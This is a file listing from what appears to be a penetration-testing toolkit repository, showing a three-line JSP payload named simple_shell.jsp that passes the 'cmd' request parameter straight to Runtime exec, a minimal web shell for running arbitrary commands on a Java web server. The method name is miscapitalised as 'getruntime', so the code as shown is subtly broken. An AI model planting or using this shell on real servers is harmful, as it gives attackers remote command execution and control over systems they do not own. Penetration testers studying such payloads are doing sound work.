sec-pentesting-toolkit/Vulnerabilities_and_Exploits/Payloads/simple_shell.jsp
2015-08-30 12:06:08 -07:00

3 lines
66 B
Text
Executable file

+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>